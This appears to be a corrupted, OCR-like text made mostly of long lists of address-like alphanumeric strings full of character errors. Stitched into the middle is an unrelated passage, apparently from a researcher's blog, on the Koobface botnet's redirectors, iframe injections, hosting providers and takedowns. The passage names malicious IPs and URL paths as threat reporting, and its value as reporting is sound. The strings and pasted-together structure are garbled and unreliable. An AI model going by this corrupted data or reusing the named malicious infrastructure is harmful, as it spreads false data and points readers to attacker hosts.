19CGMnLHT6DOowWEMEGNUisX726Lx3gcVKwp 
19Cic8kcKMskWmfijSb2ZKddUQxtYKhE6d 
LOCJFHNNZGJ9zjd 7 VUMVdeRvPQjNDPXGL4 
LOCjZ8dLY1LX4NjimtiqzvBAeCQLHXQRJDe 
19CJZWVE3UzZ9VmVLgpxdgcDy7uQpgPn7NW 
19Ckyxs6GVtVZRsP6FaVA1 Tok54sfw42E2 
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19cmfZcekKrLT9NocKUzZ63hGpNcwakuV2MD 
19cmM78n9pdmn9ScEgevff4E64BorJL1Jv 
LOCpVCxk1L5NK9n85i9dqDZngjR2wWijaJU6 
19crBtESUWDhoxKAUixfQ1laDkYk4LG99]Jj 
19CrEbWe743ua6szRayLUGvVDVLqNeFREnw 
19CrjCEHgFicHftvyfUp13J4Aox3hP99VP 
19CsjCvFbtvtNdGHNdpUS7ekzCiBSiZkYk 
19Cst9GXRKSELRHdpe1x31xNhsGemZdf6F 
19cu1lx6iDmvmkyX8W1IJARfE2kiUKxEuBJD 
19cUk1s6M4AJcKGzZkAbLtSunkUxZw6WvhE 
19CV2HS2SVoihBFr8kDSoaEeuUzdavaanQ 
19cV7wRyZxv9Dght6QTz5kQK3pasjbvaWi 
1L9CXCYRH654zRfGyP3Sjbogr4ZrjDYZK5E 
19cxmmgDpy5ELZjrcIsNNEG8emszAVWs2Y 
19CynrkVZxT5DUre6u3DASBsK2svSKjUjV 
19cZr87djDCm5i7ZK6PWFhHPPUjXTDnXVGt 
1L9CZSTJvCt8MapFiNskYYnfLdL2CaYm449 
19d1zYyjXm5ysSGM23BHMcjyUCrSCtedM3 
19D3gLzn1Vvvehdhca7w3qecEa95ywFduQ 
1L9D53JAJkKVMYWrSaWCtZCm2r7huoACQ9eB 
1L9D5eA4EwVYJVPYqQrVbXzJKdrRmE7JLSD 
19D8b3ATXTCQT1XWsP6pYeWH4WYoRtD1EN 
19DasQhJV4QzG2qeJ]QyADU1LHWfNLFPXLMf 
1LODBPfntCzZM93dN1imhYnp1RRQefFJZqaZx 
19dc3B3MrETADPVBjAzT6yX4GwzLKmUc6}j 
19dcB9pihsJPLbEDjbV5fVTSbQhs7xz86U 
19dcbUiI5Kvm8uGaQKIrKxjFGQV9CcdWkLRc 
19DdA9psrLfeLm5RaArdQjRTLeadUQSZEA 
19dfGM50pZDNHJbQKeFcr7bjxAtLoy62qK 


19dHmMHCWUnm9aLz72WbWWpQxnkgMhdy71b 


19dJS8L6CQUBijw9fk1rinEUUstDvvnTxY 
1L9DJUQPr5bogDfpitwuT 5MW5cfgnYXBvt3 
19dLZMkF6UwZRg2udtGs7L3EDXcenWRijFj 
19DoQbdFGj1wMadu3eSaWdBTncP7rw8BPy 
19DQBDQo4T5DZEHIRNdiTR8unK69UBYxQT 
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19DRitKTbC9gwyzLC6aRETdzioDE3KcPzw 
1LOdRNfg64fY9KAXtydDnxv8Pzz92yc3hSd 
19DrTFdspxMRj5JzjYTuuSevjsfuZfed41 
19DsvZvHzdixCyYfnr8rdaAeToBT XALRDxC 
19DvvMPLva9RQ9ArMwLHPtdMM8pRcM1yjQ 
19dWBSYNu/7fjPzyk1luU3SuaefRhpmriZnr 
19E4i37HBJGW7USwyQ3y7qAMZNDZfkAYeo 
19e68snjSM8hNVhHMwGDgS4hd3rgqZJnRgW 
19e74masnrSRh4PcbWKsHbdi8RKEZ9dmMEN 
19e7kLTBwzm7bawr5jkSNqhkoRkhkgXkzb 
19eBhJsxMgSbT9OWWRtBT9cEJ2wBBQhHT2xV 
19ebrGm4kpVasYZpj4j4puNZsVgNP8XjH6 
19efJYnfM8p1ESSmR8kcXCHbSoUesxXb5cw 
19EG2xYpnBtSdq14PZ8Gf830Ue4Bj1GkUc 
19egMXDyQJKP8URULkv5YNVs49eRxVov8v 
19Eia33Rgh9tw2qmm966VKRKCJM40QZGan 
19eJ/9CGjHg3TWTyyUBBHtdVap7WufoogAz 
19ephb4dnhPLVgKZd52fcyQMM5wEthdMRq 
19EqgAiYXBGwtuSKZt4G98zZWQt28s5hTjv 
19eUBU6qZmWashkyPaN4ahek7ftFHOoK5bD 
19eVCWHs9A6PdwmfbFfh890MPbhgrNjesi 
19eWDzh3MRvLqnFYeCaSpKmHuoigSwriCD 
19ewUrxrExhtPBifAyVpftFcjv35dr7zij 
1LOEYJGBRwWMA704W9FXBpGRxiwjizYvVRW4V 
19EZCwRsx36PRrNo2FsMAdVf9RuyEcTTSg 
19F4euspeSnykW3zyLAh7aXrvbWw4Pwj9U 
19fE6t4yCL35nEzkgS8fxtc8n8Z9JfXTBK 
19feFZPANADLrP9CEsXymFMByintg7eFdo 
19FESZbvQ7CWAXNDRpBrkkCWss6pMJ2vTV 
19ffvcf4kYpDoR3KBAGFLFCRnugmpHuAx2 
LOFGfgF8a5FfJoNj2PykKUZ4MoRnF9JzPfx 
19Fibcqmio4fgxauQXRPUKSBEJZUSDrZBC 
19FjRaLiqgZcC4PYjfwS8NvsHpCmaG}JkU 
19f|SQR2qmMerHBafcu3n7hwgeFiVmMU9SRT 
19Fjue]XMeZGFtRAJZEhot4uXnkj8MJ6uo0 
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19fK6EgsW 7UFa69jUomMQSNUHDcxDPpBWWjP 
19FMK3UUQPVVB1beNvrXATdajNZKhdvBQ9 
LOFNj2Cd3qgPb6cLaz26yVsugxkgd72smD 
19fp92qsB1CabnvrDjMvisSXpzv7G2tUvv 
LOFPKxm83wa8HKrCxLto1VQRfA580Apmgz 
19fQyzdgJY2ZGjkjbaYJYvy3NTGrtGgJGT 
1L9fRJIMx11Vy4zpeqoeUVyb5fScaBkZRNv3 
19fS97VT4E7xocAS7RphLKQ6qr8teSc9tC 
19fSjob1TDxzBnUjNEpCMAJHRF72utZurTF 
LOFSTAIHTmMStUd 7iBptMUMKQpCBj9FPqb53 
LOFtNTGQ7BNgRuVR4jTQcqYyPFtBgbGi9y 
19fUdwSa6cEBNVnWeFYkWc3j99cQBJxF9P 
19fuE8ikuZLPNZKbkyTEQ5UifKsBMLzTWd 
LOFUY3WbSdgqggQjUe6XK6TUCIRIGJZjTFQ 
19fwvPx2Q829Yg8AeQQSPYwi9m3Q1roPA4 
19fXFohbECqDsuG4WSS2KhtYBMLkZa2v1Z 
LOFYSmdW8hGhN4qgGbY2eTeZzyTSBuKCLtM 
19FYDYJjoWsQmfUpgRfEfhLcS2C6HMmzGxK 
19fYob7 vM6ZZb8e3cCnZXAjpPiWbPHjkKDR 
19FyxHzG6gZzZQUp35r4ZbmUQ7BMDs4DATr 
19FZKsYUi7CTZJUPOAJU2ZX4nekk692sYU 
19G1lyETeY1irt5xHmelXFTurjWgGKg3jtsq 
19G2yZGG6tQBbqxadidWDrtGBUimSm4ozi 
19g8PwWHzXPn6yUMtNStMeUhhwqwVZHUymf 
19ga8acNeT 7fCZcUg5aR72PMMx17kJkBK4 
LOGAHCHyrvVuA7nw3Xsd9wx6kqS7WF65du 
19GAzqwecgT TmeSiSUJDGoUQuXiBDjFRQT 
19GDSiD6sPJ8MvRS5HxSm1cPkF2kKJpfK5 
19GeG5EcLQ34CKeKoM1koabGiLRLUsRcCz 
19GiP1bC5qYmyoxqBmeHcFoAdRgyk1C37K 
19gjhxynYH6FAEpsJUHKLASCr2jycuqdTi 
19GMxKmgba5e7khn4AqoRi1lnGKQjiXvZx7 
19gNei8ZEAhjwGZNVz3k8dHo3mGbP3kEcd 
19gNin1xuuPijaaNe9rTUV8sw72b63Xe8H 
19goZaCLtQ3yjladQ89yqiC|x7us9VjRM7 
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19Gpgv44ftuBB3yG3xRSriAggF8ajxL4F7 
19GseQeyBSWG9cfBGraC12TYLODNP9dozB 
19gTqBXyicx5GJZvh5ruy1CfykKxs84SnE 
19GTqQXwKmMW5FKDuLh/7fjLyahqlY2YPNmc 
19gXg8eqGmN8bekrSdVwR5c8QXHTUOW4p7 
19H1ICHNYywMWMR6kCXeN8tMkKAVMooBhtV 
19h47gtSNp3uoWFJTY53iG9PDMcLtCdX36 
1LOH6FXGNFCQ2eWgww2Bbt3pFqnkGfLpyfh 
19H6 TOoAWcwnPDDCSafnuiuVs69ehAAK2P7 
19h6upg6gR7TMWNXstFoWGfhjqPd8Zix2s 
19haNmNoyQry97hnzzfpF5cxByEWfBjkvL 
19HavseYtfaSb8mfjRZRHdiffxUGfup508 
19HCDXDXJF 6gpwPysSW9epWedC8vTFXA3Q 
19Hce751lonMaBCz22b7nyCZW9Gu1p4AyS8 
19hdHepimQTpTknwQuéSiLweb9DJAbLA43 
1LOHEyAaJgwC4TgW6J5QerqM38gzTmarBji 
19hfeJ33V9ij2NNHfnzpUkXSS93KXhSw3B 
19HG7kzL26rH7SWAXEDDHkNnHi12nJbutm 
1LOHgGTMDFKhepDj8rdDzc2rQ2JF5jezWPDR 
19Hhb7kJwexWg6t9b5LMoxPgQs6ZeFSxMe 
19hKd8FSCtLP4pkpCqsoiDyC8QCVNyW/7Lr 
19Hmeznb6htBAfG9Pw28fNUZ7JLVE9FB5C5s 
19HnvoJ5UuUCU9NZRbE62gLa7X6mMCPii6S 
19hoRDfUkytiAiFkaWFrcyxpLTkGsk46je 
LOHP4WhwUc3Hy6paqfNZiJfYPrhBD2xvtNA 
19HpafHuAWJRcyENgPTqAMkS69zpDaks6g 
19HS8CwutxCUgbrUaLTZBFTwiijYKuSCte 
19hTZgLgSUdaUUNWZa6D1gFut5LkdF3rcM 
1LOHW8VTHokw69Gr1f7HqMVUjr6JPWzem4p 
LOHWEfksMj8NG7SWCA8T8b44GQ9uanFYz9 
19hYTiXSkpjPqhoxrPfUADHggEgB4ACDHM 
19ibAidpGezqRaBjiffPjb9IKPWY1pEaNB 
19iFCbGLflbvyoNTN2sfTo7piy2tebZdFn 
19ijkaewSRdSdBHeNcWnxxTAH28znV5W6u 


19ikwsKnPkKh25DX2YWkS9yQPQpSnyMWFg 
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19iMv6r3LFvalGSYZLYIRdSYjYZSnfFB9Ip 
19iIMZKc2yjLOGUHSY177M9pEVmst1fxVvW 
19iIQZCDKXo00Q1jx3hiew9zedCM91vZinNX 
19i0v46nP4AMqMDCLKD3tqUESroS]qEi92 
19ivqboqobMTMXcFkKERXkecXAMc8wGXvql1 
19iIWMCeSArEeQ89qDHfuzsnKvoCBZcGnfo 
19iZz)SdkdKiTVZWWNgap9XNn3MAfwcWcW 
19j4ksZmFb83PEULAZ4dhVzu4ywaChuvyg 
19J5pfRqXaGVFJGINQ7wfmZt7JQOMiP5me 
19J5XmHPaf3fpBrkkPFu7MRdrHMjNDKQ5P 
19j98fU7 G8DEpLNkKPWmEwkPT8TmbAdr]8c 
LOJAOFAJgT 9Gqovj6d2QcXJoz2ThgNjewe 
LOJAFCrEb7WiVHQUH84aiVmxfwKnBaug6t 
19JAM6eBnHhTBaoF vfi6XjTweLSZQdhCMT 
19Jcy4cscK2kjrEw3LkjbHMAVjaLfwjjEQ 
19jD7HJMzPRRctWdFTarhJ76r2BmMK20NZN 
19jdj5dtLUwYbcVVD3EHRmmTJfd2quhayd 
19jF38eAZYepJV3YT1Gjpyncym6GtKA1Sr 
19JfmHswm5KSdFG8PejWbsVysCKkNT6yUA 
19jG4HaiqBHZskJ8hx88JwHvTNalSyTw3z 
19JjMKEdMiiWPfwNbxf17SJM3ppujM2ZYf 
19jLCCVZFAGLIDRsaAGuvhu7kj2qpqYBcEG 
19JLWf6bx5YwPFAeLQURJj6VQs6zn3rUEyK 
19jLwzLgFMqxPkGtpFqwTkt8th6acEPZaR 
19jm4dMkcgBB31P06F8FS84j2vyPW92b8r 
19JMXaKTFUp5SC6QfAaV1VtF xfg8PdZuh9 
19joSYZNHVpY6r5dEsjN7XJHMQV6tmT13s 
19jSVtNKM3daEExobnSYBD4qVMziV9vug9 
19jTpe1lREitlg8V7KqzD8Qr4aHmkAdoiF9 
19J)VNMxsV62ERWGWWG]Qp8mtDYVDRbrbFk 
19)xBrKWHBGBATN76TKTrQUQ)JdaNYCh6Jn 
19JZDpY2XLeGF83ujdPcR2mx83b4awR5kp 
19k1VzekGwiyuLuWaNuqwUVP4b7EV8DMT8 
19k3qpwke9NkxKoW2VExEalZvfqYrqGgL1 
19k3sv6aZmMEIwNPRnr9sYVRQUMYB8s3aFZ 
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19k8LkiH66JgSEBdJZxd6RAxa9TqQ8SASr7 
19KaQXuV5M3REHoO72QDqwe6VhzeriQfSCbT 
19kb1EKW1ZQuxahuRBw19c5NNXDYpVJ2Lz 
19kCDtcGMUXMB3HAe8NHWtrbaaF p8XtKdk 
19KCVHZFMYcTFfhGxKYd24wBnaJLT vVex8 
19kESXxRByUrrMh5NMtFn1YrvBTWGMqMt7 
1LOKFBSwWAfKFUAGNprpK4PLKe9rVjJeQJwMd 
LOKhHjNHZYFILWQa2ifoWdp7b7bVS8fZSHb 
19kj2xKgo96qgxQuaRVQFmMX92CyEET7IJYVE 
19KjqFLy9kKHxNLB3]guoBHgeB1KEqJYH8M 
19Kk4m7n7SRmr2FwcFp8GgYM2zYRYJb85X 
19kKMGkwQHogoJGGLe7H2gUSjkPxH2eDCky 
1LO9KNohh3szuJC4cxq2FiglZNtVRKEyLM5i 
19kp1mMhM7jdQY2g5gD5F1rPL7eA2VwpbGS 
19kSg47CibsBZPWABbTRQN6B8porvaaWze 
19kSJ3yXifN57mMBjjbjKb56dCQTFTMEs25 
19kTx7wfngPrKnsRJXbfcloQTogkF8gDFR 
19KUb8PK59wo8M9ivWKc1lHmkjWXdvRLyEc 
19kvtSPZAtmSFi2XaKMYHvZ61Lhi9zSZoMw 
19kXkP11tuJczbZY9upVsZiBv2yprpZjaT 
19kYJ3876mMqYW1Y4VNuW8Pf2Mpu4kYz1Hk 
19L6UvVS6bW77kDNZatefC9FielRg8YZQmW 
19LOFORDJJb67i6MPR1IMH13V8brD7nxPnq 
19LECpJscPxgpqLaw649t3RKbSS7oyFYRc 
19LHsVsHVbgtevDenVb2CNTDPM5hjxsBqU 
19LiIAScVrfYrytzZLWM2QmFy9qBsvLsMoB 
19LtGwdbK3T4RgCRXgiR8) prwpLWx7NgjV 
19LTNLmy4GGJbefLxZ3dcMyaPxWEEsKndz 
19LufNzzkduVpRsnkuX339VSUGK6R3kg6i 
19LUJ706kWWcJPpyZXDhsHJs6ZufGSHQqx 
19LWEWuBDqaHHG3sCmmoxXaqfUi7E4v8S8kj 
19LyCja4QYJXkT8pMM5WyduzpSTXrghb1X 
19LZB5QkGQXbWB5zAxSDy3p6WkfssvdFbB 
19M2QHWXFYXM7U9KHX3BrmgrUj94jsqyYt5 
19M45WCRF5XH8YqHh30whAudRazx1Frq57 
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Interestingly, now that the gang’s centralized domains used in the majority of campaigns 
are not responding thanks the quick reaction of BlueConnex, they’ve started embedding 
up to 15 iFrames directly loading IPs from the Koobface botnet. The script is detected as 
Trojan-Clicker.HTML.IFrame.a. The pattern? Each and every host is serving the fake Facebook 
page from a similar directory - /Ox3E8/. 221.5.74.46 is in a process of getting shut down. 


text/html 
text/html 
text/html 


text/html 
text/html 


UPDATE: Three hours after notification, Blue Square Data Group Services Limited ensures 
that "the customer has been disconnected permanently". It’s a fact. All of Koobface worm’s 
campaigns currently redirect to nowhere. Let’s see for how long. 


Kuku Ruku Koobface! What does Koobface has to do with a legendary cocoa cream wafer 
[18]Koukou Roukou sold in the 90’s? It’s one of new domains introduced over the past seven 
days (kukuruku-290709 .com now offline thanks to community efforts). 


What is the [19]Koobface gang up to [20]Janyway? Despite that they’ve randomized 
the automatically generated directories on the compromised sites (kimchistory.freevar 
.com/fantasticfilms; tastemasters’ .ca/freeemOvie; simonsoderberg § .se/mmymOvies; 
ekespangs .se/meggavideO; akesheronline .com/privaleshOw; belljarstudio .com/bestttube), 
the gang continues relying on centralized hosting for its campaigns. 


During the week, they’ve migrated from 67.215.238 .178/redirectsoft/go/fb _s.php (Pacifi- 
cRack.com) to 85.234.141 .92/redirectsoft/go/fb s.php (BlueConnex Ltd), interestingly, they 
did so with all of the their currently active domains, the ones used as central redirection points 
on the thousands of legitimate/malicious sites participating in their campaigns. Interestingly, 
merely suspending a domain name wouldn't get you [21]a personal greeting from the Koobface 
gang, since they'll basically register a new one. Getting them kicked out of several different 
hosting providers simultaneously would. Upon having their newly pushed domains shut down, 
the gang stopped using domains and switched to the original IP of their hosting provider, once 
again requiring a direct ISP action, instead of domain registar’s one. 
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19m7Y]74FP4hwRpVzZB1LCVzgWjS5DWNKfwhm 
19mB3thetBro6ngF 7RSdGRXyHtJbcbCKmF 
1L9Mcrp4PJxWNrrtP58vvsZPbi2dsek2ph] 
19MDunAgJddMZWzvbtnBuvyGmjTsuykZkD 
19mdwoaUWMozeDjkmQ8pwUMWhRDfUjxEfk 
LOME8SGj7QJXZU4t2tn14TTAvVXXPgK5bXr 
LOMEjLBXQxrt9ww378NTyaphzqBKLXYkh] 
19MesAVkKM3wWz8XDZMNmLWHHGErRwsEaCj 
19MFrzemeaUJOQQUvyMX8mfYb5jviurofD 
19Mg5yugADkFyRjcD4bUd4wbgyyMogPxeH 
LOMgARyFWB8ak94kSmPVxqVbfhfwu4xxCj 
19mi5rmLKKA3e6H5Uu4 FEDjkH7jedoG2L1 
19mi8uF2neZSwpQKkFj LHM1eCH82TSbsGR 
19MiqalS5aTD1iZN3cSazrKZRfiEnDFtqw 
19mjhUTwr8mnypWWesFkyPCsn52Krdpnuz 
19mLUmUbrPbPy2daEbky9UcCDH8LFeUH9Z 
19mMhpiAhGHgqyckdQ7kPqVqoyjdC7jmg2] 
19mmJdnxxu6SZZ23cSuyoPLJkNTj8Xip2W 
19Mpau7GpXMbogNfVL8mMGoFGFecUTZAgh1 
LOMpSgdME2NzrR8PBZJnSh7fUE7x2ancx4 
LOMqyLM3CawYXAbqGcpzVRNG7osT83EppT 
1L9Mv8i5Pa39ygisD1xGbxUfypAivi9C6GN 
19MvoyeUumySExBsyhAfFX8JX9544UBzBb 
LOMW4QV82jky4GsipbDKpdwDvxmgDwbRy5 
LOMWQvPHXTvZkUMonLDEhDqnM917NLqe7A 
19mMZ7tbApBnSiPCtoN2ypTqFfxikg13PXH 
19n1a99kKNSAJnaUWrhvgqxBp1U54WBmJKc 
19N4L7fu74dtEMhdH9pNX46h1y7F6sZG2w 
19N7sX3r2DvB8aRRdTM2DF92teKfhohFHu 
LON9YptYUbKhinNW1gBY3t/dNFbJVH8bC58 
19nbFahDDvVNPZQSMD6QZLpZGck21NyoVy 
19ncDurW7RPEj660T Tn8HdLtooSWw17YcL 
19neLSmWpAy4Kv96XB2ZdU6VtP7pJ87qlq 
19nfc4hb4Hq71adcK1oPBih15ZrixmWaP4 
19nfSsF7H8V2cmJDc2CDdmnRvCSuwo4Sjp 
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LONgVjkVYMWdYPMVTIBiVf2StDF5krW568 
LONH1kySYE6LanXS3WHicB4h4sebM3tpEs 
19nhz2kKHPAKR6DY57fZdt4VrH6934GoPEB 
19njdbaogXophVxUnH8U0GLIRfC)xpzjeZ 
19nkoHEpPkGRQehfHN31teeHoF8q2mFCeC 
LONni1BySarJgexbVncwyFu9ptFWEksMXW 
19nnZ3b49Gs9MpiUXc7PFqkRpKJbFpRno5 
19noghZQRrA3GZHQsFDYpfv9U6AnjMypqw 
1LONparkwSGPVmeKKdbN7G7U3ukDARq6MsN 
19nq29xWSZFNdWFe2CARePs8UN7cCWH1dK 
19NQ7AM7Tvm1G6KhGahjVVh9ZAnNAmRijrLd 
19nTZW4jkaMCApofNJnmsVWFZbknnHFmVo 
19nu3NUnmyWG8qjK2yGJrpYsxmMgRjZYcW 
LONULoJynAp7uat44eUHq2wYmkBfCnepCi 
LONvzBWjrtmCiUoiINDNwX8kEEZKUpkLAph 
LONyopztjoMW8vxrr5H97Wc64fv2urHxXxXr 
LONz7JAhf84x6CPWndd1BmzcLoMyr8ddRa 
19nzzvYNM6Cta8PLBD94zZZVT gBZotEPeRy 
1902nV18sctTcuHepCbenYEWjHmvrLx3bp 
190Bd3ea5A3QPmduaYcmVemHf7NCB7LW12 
190BgS9D9otrGchnZnBkwpTjh9hMTvxXxgB 
190cNPNN95u8zjtGk]wxRpkESAYpmEi7A8 
190cX5nHCpPZMNKrquUbH6PX460Ug8TMez9 
190DcSLgi8DdY8bznVNvvRVxDc4UhXeGNM 
190DsTtriJmWeqFJwxJ3Z2tebs9CF5xwrv 
190EdnhyAhjdrLXMJQfVCFrgjlarjMZx1 
19o0fch1izhjcET2qgRZAswngKYUmTTHxZTzk 
190fhTxqUvkUi7dc2SvLMKfE6w2mo9PXMT 
190h1LHQCZ2KFNgYj2U3CPqPEPoTfMsmyi5 
190Ln2ksvp5LX77m8sc9bjsFFNiISG4F3jM 
1L9OMLCLFA8V6g4cY7Mn8cnWpFMzytHp8AL 
190qcei6EBfkPVeovNDXFmwhUHkFdNR3ab 
190rGYmRWz2zgw86EH4E59Va9ZwNB4LFDR 
190ShtfML4STk7wQJuY7TsD29rGoLGEymd 
190sq5fUGPGSd1dogZvDznAssMNGjPmTcw 
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190uX3t2i6TJEUkrGayzx4dUodT5LA6H8h 
190XB8MEDttcEAAkmafErotGuAzbYlovYn 
1LOP13NJHmCjAjyCH8UdbcjmJmb9qNkzYvu 
19P3avQkAAMracPp6fZzDLR30AR9esxXDWD1 
LOP5fgDNSiacLkTg2KCtaVc5uUGo8Grdb5 
19P6yXRONy63wX7vdWhj9xaWU7fkqWwaVMv 
1L9PORLR7onV3jn5XMEtqT qylqAHsaxMHeP 
19PBK2vT92BZehaLiifhddVx5QCbcPc77i 
19PcBzy26nm7fyyMYgtRBuPPYGKNFt37Pn 
1LOPE4eh1fTPQmvYaqfSbgYyX8tWMc4aMyYJU 
19Pe7r8WFzyEMBZVMxgehCQzk36VTVcqz6 
19PGDhhuJXaBXKu8VRpLoMkMumkkKo1ZhS 
19PgzYQPWTZSnHz5maAYM13NU1TgSXUceG 
LOpJEYHJPFRrB52bwK2f31mgBsfINTKpV3 
19pjxBMBnTM1fm4MGel1BhJduVALyDwfiaC 
19pkAxxzLqk9Y3fk3Q)J3q4YeCVSE6PLhV4 
1LOPKNoeG9VrpzXXzHT QHesleMpCquGbz4g 
19PMaisPFcwmFJQ1GjmgDaMUQvwdilV8Ba 
19pSkKrdpc46nuS7NLD41yoWYgRwBUJ1YRX 
19pt7xS8TV4w6oyy1Bnd3fkKMMSyZ2Zo01zq5 
LOPTCFVFXTSXTJtNS8SByYaJPiqKjqtZr4 
19PtgwxgkkBHWiY9gB6jRBVODUqFU6ER9H8 
19PU3kmVLpHxskzGVCXSkamszerjoc2uwm 
19PvXoA8mMgpPzCeBfV99UQyTR1vVDjtDr 
19pwBWXxNnf4qbqZz9YZUH68QboCVWGdm78 
19pWX8GgZsSayXUUAXvAs]3KSSaofEZoR] 
1L9PZTY7MZRSZEN60nBj TNqQUyNAJHpRX2X 
19PZUqwfc8o0rGcLRnk3NYbQ12rKDS5abfY 
19Q5uym5JNH8K8Vd61TvVoWgq9gQTmmP2h 
19Qd5WP4wm3SUxQKMxYENNjZzUyruxXkWff 
19QGw8bDDNioVwE9gCjxL17cYSBSHUNkbP 
1LOQhHEIJMo1lqbpNXTHDSt47YW7y28CKbKD 
19qjP9mMj9Dp9GTHWNMEDeAz28SMtpajmP2 
19Qk7tPJcgEQZ3MmMpURKZMOHTC7S8ErCv 
19qpAdinXwxsFJZd89j9u3ALMdpxe4uERX 
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19qpnqycLHTAWKmwG9B61kYyWSf7bGJJH4 
19Qq4pRWfQCPD7qHtoGwN5MMveoouPeHus 
19qQPjM4b41CknJxyxcumggM3Bbh7h9Wd3 
19Qru350vS7NswrrQK3fqSh9Cs2BNy7kht 
19qRVAZG1qd4q8kYfkKxypcedknrGSm9vo2 
19qrwRbSm8oaSqLxpbqCqgwBEuTZKB2HKA 
19Qs3PvioazgCN4GS6XVskG2n7w3jnp1jC 
19qWzhrkdgHKq2QuP4wJiMCY6F2PkijACt 
19qZKr1FY6vxHcexm8SF3WCr5MDy3mL8sQ 
19qZmkxEuSuHx8foA3wGVktnJPfnAaCb2) 
19r3TaJlyWrDF4brmYWyP8BngXdVM49BGm 
19R4vxHSk3acKATQUjZLLxUQcV3Tm52V8e 
LOR6KMTd7wWWFQXqkkXZqbSPF5P6ERddaLX 
19RajP7ifBQFZ1sqV5DGwXgwkzaZvYGJn6 
19Ram8iTJTUbBKWGWGvCG6xncGgn4L11dot 
19RAmUsDSSuyXSGEMw9urKNhF5ALnmQ942 
19rAn5nxLSYCPb50GKGXnVG77SuMCwAn]} 
19RBGpt7MB9wSp8rxXxX6rUSvkoU438pK5m1 
19rC9J9ONQKx8aJcTrX65mhse5DiBZHSGZH 
19rCad7pd9wxeDXcqcD5Aw3Va2VpNDs7p2 
19rCVFwT9QeqS9Ghitytt3az8Dh7sgXez 
19rd6NBLcsu2Dcfw4JXoCHhzhWmoTJB5q2 
19Rd98ygbbcXBZL53jbfgvttW836ejzr91 
19ReDNjujLqZbmxiSJAbCjtFLt8CbczeuY 
19rEewpMTC6TThHRAQImtWY4QynixXky3XdR 
19rfRo6XBUomPw3gSUsCpdN8eB LYipbiF} 
19rgV2MW5E3K150S6kL5qtcsG7R2wMFij) 
19riJ75Vn9eopEUZMRaPbStNpnGomarnHP 
19RnDsKHDh2DqNvaLAzrsqxeHWz3dD7LwP 
19RoSxb1ZLo7jVEazSmpxXz6VC4EXodR7yt 
19rQmtYtCQVA1DVHZBaEULhfojYvTvdYkz 
19rr3h1Q5j938F7M9JFRNbks7wS5ZxPnYN 
19rs75BaqXEwN5SsB75VCvGHPXT5emkEq8 
1LORS8JYHxXAZ2o0b TrTXxCtNdMLAXR1HUb8Eu 
19RsaeM6CUb4wxFYyte9EYnofQ92cg2ySL 
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LORUS5S5hUYtfWtujonji5 7A3DNvvsuAxpjo 
1LORV2DLJU3VQMX96jqECoBBhkP8t354Uz9 
19rVeAjH7wgeip9eAs85sPifhkjW6s9ZqT 
19rvQMWATVxTy40dQtRQ2NzweEAtDvc19x 
19rW64i0Qs43Xt1DiIQXqqcScwEpmMWENMr7 
19rwDyLGKh2ccHGLSVER93dFSKtnqVyQNE 
19rX3VIWQsefwU1xbVBDzjELFljqv2PzXu 
19rXgumhXFmSUHZyaMaleUKB2kSdkTJgaZ 
19RXkRcYGhgASJQWX9856MMAe8jQQznkCn 
19rxMgxujfJtGCUvGwzqtZYxw4TtpixRxw 
19ry7MdRsYQhdznVyvPZyaJ2WS8nRUPv1D 
19RZsZXUZUZezsiwQzJ5RnCvcUdwo3DryX 
19S2k7QWKkKBE6VZJNcZwQ1zGRfT 7DpxVVN 
19s9m9ILKLFHXOMDUiDdaXvQsG3RGhYVfL 
19SajsmTAVycJuZ8DDLDDx17yn1QQWvLVQ 
19SasnqzPJZoMyqVGYzKIrfufUcTG3pcaA 
19sb6TMH8sxq8bTv6xReU18q4xMVH4d33u 
19sC8Smaq5TmYmszvPDGjl1wNhkhjCmeVP9 
19scGaDFqCFc46umw94uf5WVGhgLXVSUMH 
19sDpNmeBSh3pJY9BJypRy8YiKAfgLfA3Z 
19SH7Kpbyv1GdsT8H2my1vXXpHT36YrCKz 
LO9SHCdo8kY5RNGRP121rcpJS31jcBsJ9PZ 
19ShV14nP45duBR8XCbJdhfl1YGNdDjLE5u 
1L9SLHEM2U3PECUg2462XiUdYw29wZXZJy2 
19Sm31ie5q2ixAZ4UZQSXcWCapaqgWLx4x 
19SmJt5JdG2qHicYJ3f9syMg3CXGw5012R 
1LO9SMpEvbaN7ZdmrdcjSEvUY9mf9ZqDAWb7 
19SmyG51vHoE2XdYQIWHMCO9RiitRBCm7ua 
19soeaitgGcEk4xF1ho7gB7Yjo6cVQFpuj 
19sqaQ2zH3vuhegE9BkczJzVGw1E3LgFrD 
19sqZcJuRSVH83WwmstsQSkKzZmJArwRDz 
19SS2iQ92v5vdkjPwnNtSalxKCcKkt19ix8 
19SspSUHZZGBFMavW3hZppxZtdo66cNG4F 
19ssZxeFtEK2B7o0dF9y5dbcAecmRCg23ti 
19sTueb9LmeX2taL9zVusYpFvpC1j9YfGx 
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19sU4pruLWnBtQV6C7SofeoauevkeDbZhX 
19sUq7btf49S4gMBKES4NUa5ez8dZqxX84N 
19SUZMKNT9doatYoanwCZtYjwZKSYfwwbt 
19sVdfwGaaWtd5vUN5jkrz1CrJ2fpVuj27 
19sw68Wb6yDEBQE3xB4kFix6sy338zkzmZb 
LOSWPUHZUY5iwREoUyisD6sLby57eeCWqS 
19swRMC4V33caXZ4kDPjcjjcPiqgZmmZ6fV 
19SWSSyr2h9GULviePowugqoHqLHu3ajWXm 
19sxEN9nqJJJo29MDGmCL1w6icdmwyV6es 
19sXVeCPLrcryN9AxQcwuAStaxMJvLQ2xh 
19sY1xtWYfCbxsmC7QCytYCvLDwVJHm6Wh 
19sZSJh4xtWbCnMKP2ZqLriGPyKPjby9Fj 
19t335zuany64MW1u2in LG5UHZfTndgTo) 
19T5chpRFcVAyuSfCeLHfLXABgwwh3vMGu 
19t5Q2r86gHTX4ucxEgMXK8NENJBoLuSyi 
19T5StiSS6SLUUBCN7fhLhW411S8BchMwG 
19t8TeeBx5T19xWGDXNZYdXLY8N5saUNoe 
19tcpRHkav5LsgLA6HQyqRNRMhjJMo2cHG6 
19TdRo2DhqBD4xgUCiIMN1XAfLSjKW4p6hg 
LOtEA4AchkTWZUqW5XTc22XDurwsev8WGC 
19teWcVofevZWaqBa3hvFpHvRELzzLYyy2} 
1L9TFRDqtoxBRhJK8s1z8FrxQJe4k4cZ6Xr 
19tfSMCmkdgdY3dshK6kr6YfkzZFfqF 6jG 
19TGVLJS2X 7oKWvCedP2ah8bK9xgjrEdZo 
19TJzVzpdhrotZUW9hdxJNiyZ6Pg7TkKQTg 
19TK7rXKG9oHuU6KNP65pvZ6UQ8uMBEidj 
LOTMkpyHDPWu5bTkdzTGdzE9MoT4y3xE9n 
